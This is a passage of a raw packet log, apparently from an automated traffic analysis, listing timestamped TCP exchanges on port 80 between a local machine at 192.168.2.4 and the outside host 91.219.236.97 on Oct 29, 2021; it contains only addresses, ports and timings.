Oct 29, 2021 20:51:20.247297049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247309923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247318029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247340918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247349024 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247363091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247386932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247399092 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247411013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247436047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247447014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247459888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247484922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247508049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247508049 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247533083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247551918 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247556925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247591972 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331312895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331351995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331374884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331398010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331422091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331444025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331448078 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331465960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331489086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331507921 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331510067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331532955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331533909 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331553936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331574917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331577063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331598997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331614971 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331619024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331640959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331662893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331665039 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331686020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331706047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331707954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331731081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331747055 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331753969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331775904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331796885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331799984 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331819057 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331831932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331841946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331865072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331877947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331887007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331909895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331921101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331932068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331954002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331967115 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.331974983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.331996918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332010031 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332020044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332042933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332055092 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332065105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332086086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332098961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332108974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332130909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332143068 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332154036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332175970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332191944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332197905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332220078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332231998 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332242012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332264900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332278013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332287073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332308054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332324028 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332329035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332350016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332364082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332370996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332391977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332405090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332412958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332434893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332447052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332458019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332479954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332500935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332506895 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332521915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332542896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332544088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332566977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332577944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332587957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332608938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332629919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332631111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332653046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332669973 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332674026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332695007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332711935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332716942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332739115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332751989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332758904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332782030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332793951 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332802057 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332823038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332845926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332859993 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332880020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332884073 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332904100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332925081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332946062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.332950115 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.332983971 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384433985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384474039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384500980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384526968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384551048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384577036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384591103 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384638071 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384643078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384670019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384695053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384706974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384763002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384787083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384799957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384812117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384835958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384860992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384908915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384932995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.384948015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.384969950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385005951 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385008097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385155916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385179996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385195017 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385201931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385225058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385246992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385246992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385270119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385288954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385289907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385313988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385325909 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385335922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385365963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385376930 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385452986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385476112 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385494947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385500908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385523081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385543108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385608912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385633945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385646105 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385674953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385699987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385711908 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385817051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385844946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385860920 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385869980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385895014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385906935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385938883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385963917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.385977030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.385988951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386013985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386025906 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386039019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386065960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386087894 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386106014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386130095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386142015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386151075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386173964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386188984 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386195898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386218071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386230946 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386243105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386265993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386279106 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386288881 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386311054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386331081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386332035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386353970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386365891 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386425018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386450052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386461973 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386475086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386497974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386521101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386539936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386578083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386579037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386617899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386643887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386653900 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386667967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386688948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386710882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386770010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386806965 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386902094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386926889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386946917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386966944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.386969090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.386991024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.387008905 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.387011051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.387033939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.387047052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.387057066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.387079954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.387093067 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.442883015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.442920923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.442945957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.442969084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.442989111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443011045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443025112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443033934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443059921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443083048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443090916 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443106890 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443125010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443129063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443151951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443172932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443175077 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443197012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443209887 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443340063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443362951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443378925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443387032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443409920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443418980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443448067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443487883 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443512917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443537951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443559885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443572998 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443583012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443619013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.443646908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443671942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443708897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.443721056 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444082975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444114923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444138050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444139957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444164038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444183111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444360971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444385052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444406986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444408894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444432020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444453001 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444643021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444669962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444686890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444691896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444716930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444730043 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444741964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444767952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444787979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444792032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444818020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444830894 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444843054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444885969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444895983 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444912910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444936991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444955111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.444961071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.444987059 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445004940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445009947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445035934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445050001 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445063114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445087910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445099115 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445113897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445138931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445157051 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445163965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445188999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445204973 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445211887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445234060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445246935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445260048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445285082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445297003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445311069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445333958 CEST	80	49865	91.219.236.97	192.168.2.4
